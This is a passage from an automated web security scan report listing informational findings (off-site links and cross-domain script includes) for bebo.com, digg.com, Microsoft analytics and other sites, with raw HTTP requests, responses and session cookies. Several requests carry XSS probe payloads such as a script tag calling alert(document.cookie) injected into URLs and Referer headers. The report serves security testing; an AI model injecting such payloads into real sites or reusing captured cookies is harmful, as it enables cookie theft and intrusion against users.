3D&ord=ThRFQQAE7qsK5XYS_5okCg==&ucm=true"></script>
...[SNIP]...
_2znd1lYJpBykwNzUyMAcxAPpNQHSpiAzDA0tgUwTIDOvNCcHyDQDiRobWBjXAgDDUBk0%26redirectURL%3Dhttp://bs.serving-sys.com/BurstingPipe/adServer.bs?cn=brd&FlightID=2800593&Page=&PluID=0&Pos=8211" target="_blank"><img src="http://bs.serving-sys.com/BurstingPipe/adServer.bs?cn=bsr&FlightID=2800593&Page=&PluID=0&Pos=8211" border=0 width=300 height=250></a>
</noscript>
<img height="1" border="0" width="1" alt="" style="display: none;" src="http://va.px.invitemedia.com/goog_imp?returnType=image&key=AdImp&cost=ThRFQQAE7qsK5XYS_5okCuK0Y1m_SICajxJycQ&creativeID=124070&message=eJyrVjI2VrJSMDI1NDHQUVAyNgJyzCwNzM1BPEMgRykkI8gtMNDR1byw2Ns0IjI43jQ_2znd1lYJpBykwNzUyMAcxAPpNQHSpiAzDA0tgUwTIDOvNCcHyDQDiRobWBjXAgDDUBk0&managed=false"/>
<iframe src='http://pixel.invitemedia.com/data_sync?partner_id=31&exchange_id=4' width='1' height='1' frameborder='0' style='display: none;' scrolling='no' marginheight='0' marginwidth='0'></iframe>
...[SNIP]...

15.27. http://pubads.g.doubleclick.net/gampad/ads previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://pubads.g.doubleclick.net
Path:	/gampad/ads

Issue detail

The page was loaded from a URL containing a query string:

http://pubads.g.doubleclick.net/gampad/ads?correlator=1309961817112&output=html&impl=ifr&client=ca-pub-1767463503520867&slotname=Bebo_ROS_ATF_160x600&page_slots=Bebo_ROS_ATF_728x90%2CBebo_ROS_ATF_160x600&cust_params=Age%3D&cookie=ID%3Db4c69d12d978f884%3AT%3D1309961817%3AS%3DALNI_MYE_lPMWMFFaRwcAhqAp3Tb_Kat8g&cookie_enabled=1&url=http%3A%2F%2Fwww.bebo.com%2Fc%2Finvite8281a%27%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253Ea91f426563e%2Fjoin&ref=http%3A%2F%2Fburp%2Fshow%2F14&lmt=1309961842&dt=1309961842849&cc=100&oe=utf-8&biw=1148&bih=723&ifi=2&adk=4030190938&u_tz=-300&u_his=3&u_java=true&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=24&flash=0&gads=v2&ga_vid=1130727521.1309961819&ga_sid=1309961819&ga_hid=33112019

The response contains the following links to other domains:

http://pagead2.googlesyndication.com/pagead/images/ad_choices_en.png
http://pagead2.googlesyndication.com/pagead/images/ad_choices_i.png
http://pagead2.googlesyndication.com/pagead/imgad?id=CNSusMyZidOX9wEQoAEY2AQyCGCkoeLMqC20
http://pagead2.googlesyndication.com/pagead/js/r20110622/r20110627/abg.js
http://www.google.com/url?ct=abg&q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://www.bebo.com/c/invite8281a%2527%25253E%25253Cscript%25253Ealert(document.cookie)%25253C/script%25253Ea91f426563e/join%26hl%3Den%26client%3Dca-pub-1767463503520867%26adU%3Dwww.lachydrin5.com%26adT%3DImageAd%26gl%3DUS&usg=AFQjCNFd3-_kbpKFlA5nDWDtAPD5xzNx9A

Request

GET /gampad/ads?correlator=1309961817112&output=html&impl=ifr&client=ca-pub-1767463503520867&slotname=Bebo_ROS_ATF_160x600&page_slots=Bebo_ROS_ATF_728x90%2CBebo_ROS_ATF_160x600&cust_params=Age%3D&cookie=ID%3Db4c69d12d978f884%3AT%3D1309961817%3AS%3DALNI_MYE_lPMWMFFaRwcAhqAp3Tb_Kat8g&cookie_enabled=1&url=http%3A%2F%2Fwww.bebo.com%2Fc%2Finvite8281a%27%253E%253Cscript%253Ealert(document.cookie)%253C%2Fscript%253Ea91f426563e%2Fjoin&ref=http%3A%2F%2Fburp%2Fshow%2F14&lmt=1309961842&dt=1309961842849&cc=100&oe=utf-8&biw=1148&bih=723&ifi=2&adk=4030190938&u_tz=-300&u_his=3&u_java=true&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=24&flash=0&gads=v2&ga_vid=1130727521.1309961819&ga_sid=1309961819&ga_hid=33112019 HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: http://www.bebo.com/c/invite8281a'%3E%3Cscript%3Ealert(document.cookie)%3C/script%3Ea91f426563e/join
Accept-Language: en-US
User-Agent: Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/5.0)
Accept-Encoding: gzip, deflate
Host: pubads.g.doubleclick.net
Proxy-Connection: Keep-Alive
Cookie: test_cookie=CheckForPermission

Response

HTTP/1.1 200 OK
P3P: policyref="http://googleads.g.doubleclick.net/pagead/gcn_p3p_.xml", CP="CURa ADMa DEVa TAIo PSAo PSDo OUR IND UNI PUR INT DEM STA PRE COM NAV OTC NOI DSP COR"
Content-Type: text/html; charset=UTF-8
X-Content-Type-Options: nosniff
Date: Wed, 06 Jul 2011 14:17:24 GMT
Server: cafe
Cache-Control: private
Content-Length: 4576
X-XSS-Protection: 1; mode=block

<html><head><style></style><script><!--
(function(){window.ss=function(d,e){window.s
...[SNIP]...
&adurl=http://www.lachydrin5.com" onFocus="ss('go to www.lachydrin5.com','aw0')" onMouseDown="st('aw0')" onMouseOver="return ss('go to www.lachydrin5.com','aw0')" onMouseOut="cs()" onClick="ha('aw0')"><img src="http://pagead2.googlesyndication.com/pagead/imgad?id=CNSusMyZidOX9wEQoAEY2AQyCGCkoeLMqC20" border="0" width="160" onload="(function(that){function c(b,a,d){if(b&&a)if(b.height>0){a.style.top=0;a.style.visibility='visible'}else setTimeout(function(){c(b,a,d*2)},d)}c(that,document.getElementById('abgc'),10);})(this);" /></a>
...[SNIP]...
<span style="display:inline-block;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='http://pagead2.googlesyndication.com/pagead/images/ad_choices_i.png');height:15px;width:19px"><img src='http://pagead2.googlesyndication.com/pagead/images/ad_choices_i.png' alt="(i)" border=0 style=filter:progid:DXImageTransform.Microsoft.Alpha(opacity=0) height=15px width=19px/></span></div><div id=abgs><a href="http://www.google.com/url?ct=abg&q=https://www.google.com/adsense/support/bin/request.py%3Fcontact%3Dabg_afc%26url%3Dhttp://www.bebo.com/c/invite8281a%2527%25253E%25253Cscript%25253Ealert(document.cookie)%25253C/script%25253Ea91f426563e/join%26hl%3Den%26client%3Dca-pub-1767463503520867%26adU%3Dwww.lachydrin5.com%26adT%3DImageAd%26gl%3DUS&usg=AFQjCNFd3-_kbpKFlA5nDWDtAPD5xzNx9A" target=_blank><span style="display:inline-block;filter:progid:DXImageTransform.Microsoft.AlphaImageLoader(src='http://pagead2.googlesyndication.com/pagead/images/ad_choices_en.png');height:15px;width:77px"><img alt="AdChoices" border=0 height=15px src=http://pagead2.googlesyndication.com/pagead/images/ad_choices_en.png style=filter:progid:DXImageTransform.Microsoft.Alpha(opacity=0) width=77px/></span>
...[SNIP]...
</script><script src="http://pagead2.googlesyndication.com/pagead/js/r20110622/r20110627/abg.js"></script>
...[SNIP]...

15.28. http://s.bebo.com/c/site/index20_script.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://s.bebo.com
Path:	/c/site/index20_script.js

Issue detail

The page was loaded from a URL containing a query string:

http://s.bebo.com/c/site/index20_script.js?fp=1ac0db15f4e80064d8323ae07c9b030a

The response contains the following link to another domain:

http://www.adobe.com/go/getflashplayer

Request

GET /c/site/index20_script.js?fp=1ac0db15f4e80064d8323ae07c9b030a HTTP/1.1
Host: s.bebo.com
Proxy-Connection: keep-alive
Referer: http://www.bebo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bdaysession=3ed3f970babdc8d864296861; sessioncreate=20110706112129; bvid=83c54b44-e0db-47d2-b16c-752d38b1e9b7|1309951289065

Response

HTTP/1.1 200 OK
Server: Resin/3.0.24
Content-Language: us-US
Content-Type: text/javascript
Content-Length: 2642
Date: Wed, 06 Jul 2011 11:22:04 GMT
Connection: close
Cache-Control: max-age=315360000

bebo.ui.LoginForm = new Class({
initialize: function(form) {
this.ele = ele = $(form);

if(!this.ele) { //no signin form
return;
}

this.cookieUser=Cookie.rea
...[SNIP]...
<p class='empty'> <a href='http://www.adobe.com/go/getflashplayer'>" +
" <img src='http://s.bebo.com/img/get_adobe_flash_player.png' alt='Get Adobe Flash Player'>
...[SNIP]...

15.29. http://s.bebo.com/js/mediaboxAdv-1.3.4b.js previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://s.bebo.com
Path:	/js/mediaboxAdv-1.3.4b.js

Issue detail

The page was loaded from a URL containing a query string:

http://s.bebo.com/js/mediaboxAdv-1.3.4b.js?fp=c394b8c7534933c102edd47a8c732145

The response contains the following link to another domain:

http://www.adobe.com/shockwave/download/download.cgi?P1_Prod_Version=ShockwaveFlash

Request

GET /js/mediaboxAdv-1.3.4b.js?fp=c394b8c7534933c102edd47a8c732145 HTTP/1.1
Host: s.bebo.com
Proxy-Connection: keep-alive
Referer: http://www.bebo.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: bdaysession=3ed3f970babdc8d864296861; sessioncreate=20110706112129; bvid=83c54b44-e0db-47d2-b16c-752d38b1e9b7|1309951289065

Response

HTTP/1.1 200 OK
Server: Resin/3.0.24
ETag: "FosXLUyhIoJ"
Last-Modified: Tue, 08 Mar 2011 00:51:49 GMT
Content-Type: application/x-javascript
Vary: Accept-Encoding
Content-Length: 41592
Date: Wed, 06 Jul 2011 11:22:06 GMT
Connection: close
Cache-Control: max-age=315360000

/*
   mediaboxAdvanced v1.3.4b - The ultimate extension of Slimbox and Mediabox; an all-media script
   updated 2010.09.21
       (c) 2007-2010 John Einselen <http://iaian7.com>
   based on Slimbox v1.64 - The u
...[SNIP]...
<br/>Adobe Flash is either not installed or not up to date, please visit <a href="http://www.adobe.com/shockwave/download/download.cgi?P1_Prod_Version=ShockwaveFlash" title="Get Flash" target="_new">Adobe.com</a>
...[SNIP]...

16. Cross-domain script include previous next
There are 40 instances of this issue:

http://about.digg.com/
http://about.digg.com/ads
http://about.digg.com/blog
http://about.digg.com/contact
http://about.digg.com/faq
http://about.digg.com/partnership
http://about.digg.com/privacy
http://about.digg.com/terms-use
http://ad.doubleclick.net/adi/N3285.google/B2343920.122
http://analytics.microsoft.com/Sync.html
http://analytics.msn.com/Include.html
http://bcp.crwdcntrl.net/px
https://blog.metricstream.com/
http://blog.softlayer.com/
http://blogs.technet.com/b/microsoft_blog/archive/2011/07/05/microsoft-releases-new-threat-data-on-rustock.aspx
http://blogs.technet.com/b/microsoft_on_the_issues/archive/2010/12/10/microsoft-adds-new-defendant-in-click-laundering-lawsuit.aspx
http://blogs.technet.com/b/microsoft_on_the_issues/archive/2011/03/17/taking-down-botnets-microsoft-and-the-rustock-botnet.aspx
http://developers.digg.com/
http://digg.com/
http://digg.com/login
http://digg.com/register
http://digg.com/search
http://digg.com/submit
http://digg.com/topic
http://digg.com/upcoming
http://docs.jquery.com/Tutorials:Introducing_$(document
http://docs.jquery.com/UI
http://docs.jquery.com/UI/Accordion
http://docs.jquery.com/UI/Effects/
http://docs.jquery.com/UI/Effects/Slide
http://googleads.g.doubleclick.net/pagead/ads
http://jobs.digg.com/
http://jquery.com/
http://jquery.malsup.com/cycle/
http://jqueryui.com/about
http://jqueryui.com/themeroller/
http://malsup.com/jquery/cycle/
http://medienfreunde.com/lab/innerfade/
http://pubads.g.doubleclick.net/gampad/ads
http://pubads.g.doubleclick.net/gampad/ads

Issue background

When an application includes a script from an external domain, this script is executed by the browser within the security context of the invoking application. The script can therefore do anything that the application's own scripts can do, such as accessing application data and performing actions within the context of the current user.

If you include a script from an external domain, then you are trusting that domain with the data and functionality of your application, and you are trusting the domain's own security to prevent an attacker from modifying the script to perform malicious actions within your application.

Issue remediation

Scripts should not be included from untrusted domains. If you have a requirement which a third-party script appears to fulfil, then you should ideally copy the contents of that script onto your own domain and include it from there. If that is not possible (e.g. for licensing reasons) then you should consider reimplementing the script's functionality within your own code.

16.1. http://about.digg.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://about.digg.com
Path:	/

Issue detail

The response dynamically includes the following script from another domain:

http://developers.diggstatic.com/files/js/js_8f62bc98108fbe132c288c6283f26d44.js

Request

GET / HTTP/1.1
Host: about.digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

16.2. http://about.digg.com/ads previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://about.digg.com
Path:	/ads

Issue detail

The response dynamically includes the following script from another domain:

http://developers.diggstatic.com/files/js/js_5bbcd6ad326461eca34aa632bf360727.js

Request

GET /ads HTTP/1.1
Host: about.digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

16.3. http://about.digg.com/blog previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://about.digg.com
Path:	/blog

Issue detail

The response dynamically includes the following script from another domain:

http://developers.diggstatic.com/files/js/js_8f62bc98108fbe132c288c6283f26d44.js

Request

GET /blog HTTP/1.1
Host: about.digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

16.4. http://about.digg.com/contact previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://about.digg.com
Path:	/contact

Issue detail

The response dynamically includes the following script from another domain:

http://developers.diggstatic.com/files/js/js_cb92efda53d6dfcba92cf898d0c2f350.js

Request

GET /contact HTTP/1.1
Host: about.digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

16.5. http://about.digg.com/faq previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://about.digg.com
Path:	/faq

Issue detail

The response dynamically includes the following scripts from other domains:

http://developers.diggstatic.com/files/js/js_4aa5757d2430db20fabb438d36c046b7.js
http://developers.diggstatic.com/sites/all/modules/digg/js/faq-tracking.js?9

Request

GET /faq HTTP/1.1
Host: about.digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:21:16 GMT
Server: Apache
X-Powered-By: PHP/5.2.9-digg8
Set-Cookie: SESSffbdf82fc09bcc0e216782b4624d5374=2eb23705fdf587154cd28b12c4d39ae6; expires=Fri, 29-Jul-2011 14:54:36 GMT; path=/; domain=.about.digg.com
Expires: Sun, 19 Nov 1978 05:00:00 GMT
Last-Modified: Wed, 06 Jul 2011 11:21:16 GMT
Cache-Control: store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Vary: Accept-Encoding
Connection: close
Content-Type: text/html; charset=utf-8
Content-Length: 25290

<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
<meta http-equiv="Content-Type" content="text/html; charset=utf-8" />
<meta http-equiv="Content-Type" content="text/html; charset=
...[SNIP]...
</div>
<script type="text/javascript" defer="defer" src="http://developers.diggstatic.com/sites/all/modules/digg/js/faq-tracking.js?9"></script>
...[SNIP]...
</script>
<script type="text/javascript" src="http://developers.diggstatic.com/files/js/js_4aa5757d2430db20fabb438d36c046b7.js"></script>
...[SNIP]...

16.6. http://about.digg.com/partnership previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://about.digg.com
Path:	/partnership

Issue detail

The response dynamically includes the following script from another domain:

http://developers.diggstatic.com/files/js/js_5bbcd6ad326461eca34aa632bf360727.js

Request

GET /partnership HTTP/1.1
Host: about.digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

16.7. http://about.digg.com/privacy previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://about.digg.com
Path:	/privacy

Issue detail

The response dynamically includes the following script from another domain:

http://developers.diggstatic.com/files/js/js_5bbcd6ad326461eca34aa632bf360727.js

Request

GET /privacy HTTP/1.1
Host: about.digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

16.8. http://about.digg.com/terms-use previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://about.digg.com
Path:	/terms-use

Issue detail

The response dynamically includes the following script from another domain:

http://developers.diggstatic.com/files/js/js_5bbcd6ad326461eca34aa632bf360727.js

Request

GET /terms-use HTTP/1.1
Host: about.digg.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

16.9. http://ad.doubleclick.net/adi/N3285.google/B2343920.122 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://ad.doubleclick.net
Path:	/adi/N3285.google/B2343920.122

Issue detail

The response dynamically includes the following script from another domain:

http://s0.2mdn.net/879366/flashwrite_1_2.js

Request

GET /adi/N3285.google/B2343920.122;sz=728x90;click=http://adclick.g.doubleclick.net/aclk?sa=l&ai=B-uRkF00UTuLRH4H3lQfH3smdAYuv__wB8_Gl6Biz9fHdSuDrJRABGAEgvs7lDTgAUIGjhfIDYMnW8obIo_waoAH9pPvoA7oBCTcyOHg5MF9hc8gBCdoBbGZpbGU6Ly8vRDovYWN1bmV0aXhfcmVwb3J0cy9yZXBvcnRzL2FkZHRoaXNjb20vZG9tLWJhc2VkLXhzcy1yZWZsZWN0ZWQtY3Jvc3Mtc2l0ZS1zY3JpcHRpbmctZXhhbXBsZS1wb2MuaHRtbPgBAbgCGMACAcgCi5vhEagDAdED4Mvbl_AJCmHoA90F9QMCAADE&num=1&sig=AGiWqtxnBD-2u8FGkhPuGlg3V_qmJff9bA&client=ca-pub-4063878933780912&adurl=;ord=145924632? HTTP/1.1
Host: ad.doubleclick.net
Proxy-Connection: keep-alive
Referer: http://googleads.g.doubleclick.net/pagead/ads?client=ca-pub-4063878933780912&output=html&h=90&slotname=2510184792&w=728&lmt=1309971302&flash=10.3.181&url=file%3A%2F%2F%2FD%3A%2Facunetix_reports%2Freports%2Faddthiscom%2Fdom-based-xss-reflected-cross-site-scripting-example-poc.html&dt=1309953302639&bpp=4&shv=r20110622&jsv=r20110627&correlator=1309953302996&jscb=1&frm=4&adk=1607234649&ga_vid=1503131442.1309953303&ga_sid=1309953303&ga_hid=870491465&ga_fc=0&u_tz=-300&u_his=1&u_java=1&u_h=1200&u_w=1920&u_ah=1156&u_aw=1920&u_cd=32&u_nplug=8&u_nmime=43&biw=1041&bih=806&fu=0&ifi=1&dtd=767&xpc=T0UwuNN7Sv&p=file%3A//
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: id=ca42d81370000b3|2010860/738146/15149,2588783/933076/15138,690333/262595/15114|t=1305367759|et=730|cs=002213fd482cdcbface2418698

Response

16.10. http://analytics.microsoft.com/Sync.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://analytics.microsoft.com
Path:	/Sync.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://analytics.atdmt.com/Scripts/wlHelper.js?i=MUID
http://analytics.live.com/Scripts/wlHelper.js?i=ANID

Request

GET /Sync.html HTTP/1.1
Host: analytics.microsoft.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://search.microsoft.com/Preference.aspx?bd498%22%3E%3Cscript%3Ealert(1)%3C/script%3Ef1d3c6b4585=1
Cookie: A=I&I=AxUFAAAAAABeBwAAdiWT9utCiviB3HCxuYLMlg!!&M=1; MC1=GUID=da1fbe1efa0ae044924b597eae0c35af&HASH=1ebe&LV=20116&V=3; omniID=1308621908165_e848_1389_f5bb_98e500b1fd19; WT_FPC=id=173.193.214.243-2855267600.30158775:lv=1308648584991:ss=1308648377209; WT_NVR_RU=0=technet:1=:2=; msdn=L=1033; s_nr=1308622093188; s_vnum=1311214093190%26vn%3D1; _opt_vi_64WS79UG=C78BD0AA-E1D9-4F06-8CD8-1337F190ABC8; MUID=3957719BE8F34A5DA51D204E7E06704A; MSID=Microsoft.CreationDate=06/21/2011 02:08:26&Microsoft.LastVisitDate=06/21/2011 12:29:48&Microsoft.VisitStartDate=06/21/2011 12:26:20&Microsoft.CookieId=2ad2bd8a-437d-4ebd-affe-5214ddd829eb&Microsoft.TokenId=ffffffff-ffff-ffff-ffff-ffffffffffff&Microsoft.NumberOfVisits=6&Microsoft.CookieFirstVisit=1&Microsoft.IdentityToken=AA==&Microsoft.MicrosoftId=0479-3054-8088-8697; stFI=Thu%2C%2021%20Jul%202011%2002%3A08%3A34%20GMT; UserState=Returning=False&LastVisit=06/21/2011 12:29:32&UserEBacExpression=+ 0|2 + 1|8 2|1024; MSPartner2=LogUser=ab73286e-0ac2-4078-b206-f36cf569711d&RegUser=

Response

HTTP/1.1 200 OK
Content-Type: text/html
Last-Modified: Sat, 07 May 2011 00:59:31 GMT
Accept-Ranges: bytes
ETag: "e94f40652ccc1:0"
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Wed, 06 Jul 2011 11:25:53 GMT
Content-Length: 607

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<title>Sync</title>
...[SNIP]...
</span>
<script type="text/javascript" src="//analytics.atdmt.com/Scripts/wlHelper.js?i=MUID"></script>
<script type="text/javascript" src="//analytics.live.com/Scripts/wlHelper.js?i=ANID"></script>
...[SNIP]...

16.11. http://analytics.msn.com/Include.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://analytics.msn.com
Path:	/Include.html

Issue detail

The response dynamically includes the following scripts from other domains:

http://analytics.atdmt.com/Scripts/wlHelper.js?i=MUID
http://analytics.live.com/Scripts/wlHelper.js?i=ANID

Request

GET /Include.html HTTP/1.1
Host: analytics.msn.com
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.2.13) Gecko/20110504 Namoroka/3.6.13
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: en-us,en;q=0.5
Accept-Encoding: gzip,deflate
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.7
Keep-Alive: 115
Proxy-Connection: keep-alive
Referer: http://analytics.microsoft.com/Sync.html
Cookie: MC1=V=3&GUID=af7f3bc9414d4d7f98f7762d0ecd4c67; mh=LENOVO; CC=US; CULTURE=EN-US; MSNRPSShare=1; MUID=3957719BE8F34A5DA51D204E7E06704A; Sample=87; ANON=A=09C89511BF100DC2E6BE1C66FFFFFFFF&E=b48&W=1; NAP=V=1.9&E=aee&C=1y2a1t4TVNCPNy9y9DmWgYg0jNzUVxeHBpRB9YpCzs7AkrhVIlPNyg&W=1; zip=z:75207|la:32.7825|lo:-96.8207|ci:Dallas|c:US; expid=id=a7ed379634844c0891f7fd0905cd7d4e&bd=2011-07-02T23:40:18.696&v=2; SRCHHPGUSR=AS=1; MSNTVID=af7f3bc9414d4d7f98f7762d0ecd4c67

Response

HTTP/1.1 200 OK
Content-Type: text/html
Last-Modified: Sat, 07 May 2011 00:59:27 GMT
Accept-Ranges: bytes
ETag: "fa66cf352ccc1:0"
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-Powered-By: ASP.NET
P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo"
Date: Wed, 06 Jul 2011 11:25:57 GMT
Content-Length: 464

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" >
<head>
<title>Sync</title>
...[SNIP]...
</span>
<script type="text/javascript" src="//analytics.atdmt.com/Scripts/wlHelper.js?i=MUID"></script>
<script type="text/javascript" src="//analytics.live.com/Scripts/wlHelper.js?i=ANID"></script>
...[SNIP]...

16.12. http://bcp.crwdcntrl.net/px previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://bcp.crwdcntrl.net
Path:	/px

Issue detail

The response dynamically includes the following script from another domain:

http://segment-pixel.invitemedia.com/pixel?code=2716&partnerID=88&key=segment&returnType=js

Request

Response

16.13. https://blog.metricstream.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://blog.metricstream.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://s7.addthis.com/js/250/addthis_widget.js
https://ajax.googleapis.com/ajax/libs/jquery/1.5.0/jquery.min.js?ver=1.5.0

Request

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 13:46:21 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
X-Pingback: https://blog.metricstream.com/xmlrpc.php
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 32336

<!DOCTYPE html>
<html dir="ltr" lang="en-US">
<head>
<meta charset="UTF-8" />
<title>MetricStream GRC Blog | Governance, Risk, Compliance and Quality Management</title>


<link rel="
...[SNIP]...
</script>
<script type='text/javascript' src='https://ajax.googleapis.com/ajax/libs/jquery/1.5.0/jquery.min.js?ver=1.5.0'></script>
...[SNIP]...
</script><script type="text/javascript" src="http://s7.addthis.com/js/250/addthis_widget.js#pubid=mericstream"></script>
...[SNIP]...

16.14. http://blog.softlayer.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://blog.softlayer.com
Path:	/

Issue detail

The response dynamically includes the following scripts from other domains:

http://munchkin.marketo.net/munchkin.js
http://stats.wordpress.com/e-201127.js
http://widgets.twimg.com/j/2/widget.js

Request

GET / HTTP/1.1
Host: blog.softlayer.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Wed, 06 Jul 2011 11:21:18 GMT
Server: Apache/2.2.17 (FreeBSD) mod_ssl/2.2.17 OpenSSL/1.0.0a DAV/2
X-Pingback: http://blog.softlayer.com/xmlrpc.php
Link: <http://wp.me/1gwb0>; rel=shortlink
Connection: close
Content-Type: text/html; charset=UTF-8
Content-Length: 95923

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml" dir="ltr" lang="en-US">

<head p
...[SNIP]...

<script src="http://munchkin.marketo.net/munchkin.js" type="text/javascript"></script>
...[SNIP]...
<div class="execphpwidget"><script src="http://widgets.twimg.com/j/2/widget.js"></script>
...[SNIP]...
<script src="http://stats.wordpress.com/e-201127.js" type="text/javascript"></script>
...[SNIP]...

16.15. http://blogs.technet.com/b/microsoft_blog/archive/2011/07/05/microsoft-releases-new-threat-data-on-rustock.aspx previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://blogs.technet.com
Path:	/b/microsoft_blog/archive/2011/07/05/microsoft-releases-new-threat-data-on-rustock.aspx

Issue detail

The response dynamically includes the following script from another domain:

http://www.microsoft.com/presspass/blog/js/wt.js

Request

GET /b/microsoft_blog/archive/2011/07/05/microsoft-releases-new-threat-data-on-rustock.aspx HTTP/1.1
Host: blogs.technet.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: omniID=1306444613329_0b6a_7430_ae20_acaad3f30011; mstcid=173653f

Response

HTTP/1.1 200 OK
Cache-Control: no-cache, no-store
Pragma: no-cache
Content-Type: text/html; charset=utf-8
Expires: -1
Vary: Accept-Encoding
Server: Microsoft-IIS/7.5
X-FRAME-OPTIONS: SAMEORIGIN
Telligent-Evolution: 5.6.583.17018
P3P: CP="ALL IND DSP COR ADM CONo CUR CUSo IVAo IVDo PSA PSD TAI TELo OUR SAMo CNT COM INT NAV ONL PHY PRE PUR UNI"
